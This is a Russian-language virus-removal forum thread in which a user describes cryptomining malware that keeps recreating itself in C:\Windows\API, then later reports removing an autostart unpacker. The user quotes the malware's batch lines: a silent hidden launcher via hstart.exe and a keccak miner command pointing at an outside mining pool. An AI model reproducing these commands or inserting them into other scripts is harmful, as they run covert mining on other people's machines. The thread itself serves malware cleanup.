Показано с 1 по 3 из 3.

Вирус - майнинг на чужой видеокарте. Нагрузка GPU в простое... (заявка № 158265)

  1. #1
    Junior Member Репутация
    Регистрация
    13.04.2014
    Сообщений
    2
    Вес репутации
    37

    Вирус - майнинг на чужой видеокарте. Нагрузка GPU в простое...

    Появился вирус нагружающий GPU. Через Process Explorer нашел путь до исполняемых файлов: "c:\Windows\API\". В нем очень много файлов. Но вот главные из них:
    1. 1.bat
      Код:
      hstart.exe /NOCONSOLE /SILENT "C:\Windows\API\Lark.bat"
    2. Lark.bat
      Код:
      systems --keccak -o http://pool.flylark.net:8332 -u admin.windows -p microsoft -w 32

    Понятно, что на мне майнят на пулле [удалено]. Похожий вирус я уже находил, и удалил его из %AppData%/Roaming/*****/*****.js - файл формата JavaScript, который и создавал исполняемый файл для запуска.
    Сейчас же я не могу его найти. Помогите пожалуйста, как можно определить откуда он создается?

    PS: после удаления папки "c:\Windows\API\" и перезагрузке системы все файлы пересоздаются.
    Последний раз редактировалось thyrex; 14.04.2014 в 20:32.

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,287
    Вес репутации
    378
    Уважаемый(ая) DarkSector, спасибо за обращение на наш форум!

    Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.

    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Junior Member Репутация
    Регистрация
    13.04.2014
    Сообщений
    2
    Вес репутации
    37
    Авто распаковщик был найден в "Автозагрузке". После удаления мучение мое прекратилось.

Похожие темы

  1. по РДП входит кто-то чужой
    От Е.Ш. в разделе Помогите!
    Ответов: 7
    Последнее сообщение: 01.10.2013, 13:05
  2. нагрузка на процессор подозрение на вирус
    От DreamFire в разделе Помогите!
    Ответов: 3
    Последнее сообщение: 26.02.2012, 22:04
  3. Вирус Bot.exe нагрузка ЦП!
    От xpadd91 в разделе Помогите!
    Ответов: 6
    Последнее сообщение: 25.12.2010, 16:37
  4. nVidia CUDA: вычисления на видеокарте или смерть CPU?
    От ALEX(XX) в разделе Новости аппаратного обеспечения
    Ответов: 2
    Последнее сообщение: 28.06.2008, 00:00
  5. Помогите... Срочно..Нужна консультация по видеокарте..
    От Alena_7 в разделе Аппаратное обеспечение
    Ответов: 1
    Последнее сообщение: 09.07.2007, 16:58

Метки для этой темы

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.01399 seconds with 17 queries